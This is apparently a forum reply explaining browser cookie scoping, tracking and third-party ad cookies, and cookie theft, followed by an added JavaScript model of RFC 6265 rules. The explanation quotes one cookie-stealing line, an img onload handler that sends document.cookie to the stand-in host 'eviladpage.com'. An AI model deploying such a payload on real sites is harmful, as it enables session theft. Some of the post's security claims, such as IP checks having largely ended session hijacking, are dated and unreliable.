Not true, BC_Programmer.
The browser only allows client side script to view cookies designated as being viewable by the URL as well as cookies designated as anonymous.
A cookie is simply a small text file. All it contains is:
1. A name-value pair containing the actual data
2. An expiry date after which it is no longer valid
3. The domain and path of the server it should be sent to
Note that traditionally number 3 is designated by the filename; Internet Explorer does this. Other browsers store it in a database or other format.
When you request a page and have cookies enabled, the cookie file/data <only for that site> is sent in the HTTP header, and therefore only the cookie data for that site is accessible from a server-side script.
Client side script can only access cookie data designated for its domain. You cannot spy from one site on the cookies created by www.Microsoft.com, for example (unless there is an unintended browser vulnerability that makes this possible).
A tracking cookie, for example, despite what many people have been led to believe, can only track users' browser habits across a single domain. This is done by storing, server side, information about the IP address, and generating a random string for each IP address. The browser of course saves this cookie, and thereafter sends that cookie back to the server whenever it navigates across pages within that domain. The server can then use this cookie data and create a log of IP address, page viewed, and the randomly generated key which can later be analyzed to view users' browsing habits. In particular it can even track when users change IP addresses, as the browser will send the same cookie containing the same randomly generated string that can be used to look up previous addresses used by the same visitor.
Adware and spyware cookies are third party cookies that are usually set and retrieved via the use of an image from their domain. This is facilitated by the owner of the domain and permitted by them in exchange for ad revenue. The images that are used for advertisements come from a separate domain; when retrieving these objects the browser sends the same HTTP request header and as per usual sends the cookie information for the domain that the image resides on: the advertisement site, for example. The advertising site can then store information regarding the actual page being viewed, the IP address, and other tracking information.
A cookie is set by the server; the browser itself is responsible for storing the cookie. For example, a browser might send this request to load a page:
GET /forum/index.php HTTP/1.1
Host: www.computerhope.com
The server replies with a GET response, which can optionally include a request for the browser to store cookies:
HTTP/1.1 200 OK
Content-type: text/html
Set-Cookie: name=value
Since HTTP GET is used to download images as well as other content, this is how "third party" cookies are stored. You might never visit any actual page on ad.doubleclick.net or whatever, but their images and other content are used on a variety of advertisement packages that other sites employ to get ad revenue. These images are downloaded from that server and can therefore request the storage of cookies as well as read cookies from your computer that relate to ad.doubleclick.net.
Therefore when requesting a page containing advertisements, the GET request sent from the browser will contain the cookie data stored for the domain that the image resides on. The server can do what it wants with this data. For advertising sites this probably gets stored in a database somewhere and is used for tracking user habits. Of course the cookie is hardly the <dangerous> part here, since the server could just as easily, and they often do, track movement throughout ad supported pages simply via IP address.
Spyware can of course see anything on your PC and cookies are no exception. If you have spyware, cookies really shouldn't be a front row concern anyway, since the spyware can watch <everything> you do. It doesn't need to read your cookies to find out your password for certain sites; it can just watch you type them, something it can force you to do by deleting the cookies (which don't usually contain your password plaintext anyway).
But when it comes to actual websites, only the domain that created the cookie can read the cookie data. For example, Google stores a cookie when you save your search preferences, such as language, safesearch, etc.
An interesting thing is, if you change your preferences for google.com, even google.ca or google.it cannot see them. To test, I visited www.google.it and changed my preferences there to display 100 search results. I then saved them (of course) and went to www.google.com (which redirects to google.ca) and did a search. I still only got 10 results per page. However, searching with google.it showed 100 results per page.
Cookie theft is probably the only thing that somebody can worry about; this is facilitated by a link or URL being used on one page being used to access another. If the URL is generated via JavaScript it can be made to include all the cookie data for the first party site. For example, an advertisement might have its image created as such:
<img onload="this.src ='http://eviladpage.com/stole.php?text='+escape(document.cookie); return false;">
The server at "eviladpage" now has access to the cookies from the first party site where the image was (often by way of advertisements) by way of the PHP parameter "text" being sent. It can then store all that away in a database on the ad site as it pleases.
However, technically speaking, such use of indirection is not really the ad site reading the cookies from another domain; instead, the first domain is explicitly sending the cookie data it has (well, actually the browser is, but the first party site has the image reference) to the ad site; disabling JavaScript or using an ad blocker stops this completely.
During the early days of cookie use there was a technique done called "cookie poisoning" wherein an attacker on one PC could hijack an active session of a user on another PC by sending a cookie that makes the server think it came from the victim. This is hardly relevant, though, since this has largely been eliminated by a quick comparison between two IP addresses as well as making such keys different each session.
Cookies, in general, are harmless compared to the other methods of client-side storage such as the new DOM Storage mechanism that will be used in HTML 5 as well as DHTML behaviours (which I think have been (thankfully) removed from IE).
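Added example, not part of the original post: a simplified model, written from RFC 6265, of the scoping rules the post describes, showing which stored cookies a browser attaches to a request and which ones page script can read. The host `ad.example.net` and all cookie names and values are constructed; the `HttpOnly` attribute, which the post does not mention, is included because it keeps a cookie out of `document.cookie`.

```javascript
// Simplified RFC 6265 scoping: no expiry, Secure, SameSite or public-suffix checks. Sample data is constructed.
function domainMatch(host, domain) {
  const h = host.toLowerCase();
  return h === domain || h.endsWith("." + domain);
}

function pathMatch(reqPath, cookiePath) {
  return reqPath === cookiePath || (reqPath.startsWith(cookiePath) &&
    (cookiePath.endsWith("/") || reqPath[cookiePath.length] === "/"));
}

// Process a Set-Cookie header from a response served by reqHost at reqPath.
function storeCookie(jar, reqHost, reqPath, header) {
  const [pair, ...attrs] = header.split(";").map(s => s.trim());
  const eq = pair.indexOf("=");
  if (eq < 1) return false;
  const c = { name: pair.slice(0, eq), value: pair.slice(eq + 1), domain: reqHost.toLowerCase(),
              hostOnly: true, httpOnly: false, path: reqPath.slice(0, reqPath.lastIndexOf("/")) || "/" };
  for (const attr of attrs) {
    const [key, val = ""] = attr.split("=").map(s => s.trim());
    const k = key.toLowerCase();
    if (k === "domain" && val) { c.domain = val.replace(/^\./, "").toLowerCase(); c.hostOnly = false; }
    else if (k === "path" && val.startsWith("/")) c.path = val;
    else if (k === "httponly") c.httpOnly = true;
  }
  // A server can only set cookies for its own host or a parent domain of it.
  if (!domainMatch(reqHost, c.domain)) return false;
  jar.push(c);
  return true;
}

// Cookies attached to a request for host/path, or (fromScript) visible via document.cookie.
function cookieHeader(jar, host, path, fromScript = false) {
  return jar
    .filter(c => (c.hostOnly ? host.toLowerCase() === c.domain : domainMatch(host, c.domain)))
    .filter(c => pathMatch(path, c.path) && !(fromScript && c.httpOnly))
    .map(c => `${c.name}=${c.value}`).join("; ");
}

function demo() {
  const jar = [];
  storeCookie(jar, "www.google.it", "/preferences", "prefs=num100; Domain=google.it; Path=/");
  storeCookie(jar, "www.computerhope.com", "/forum/index.php", "sid=abc123; Path=/; HttpOnly");
  storeCookie(jar, "ad.example.net", "/banner.gif", "uid=r4nd0m");
  const send = (host, path, js) => cookieHeader(jar, host, path, js);
  return { googleIt: send("www.google.it", "/search"), googleCom: send("www.google.com", "/search"),
           forumHttp: send("www.computerhope.com", "/forum/index.php"),
           forumScript: send("www.computerhope.com", "/forum/index.php", true),
           adImage: send("ad.example.net", "/banner.gif") };
}
```

Calling `demo()` shows the forum's `HttpOnly` session cookie going out with the HTTP request while being absent from what script on the same page can read, so an injected `document.cookie` exfiltration like the one in the post gets nothing for that cookie.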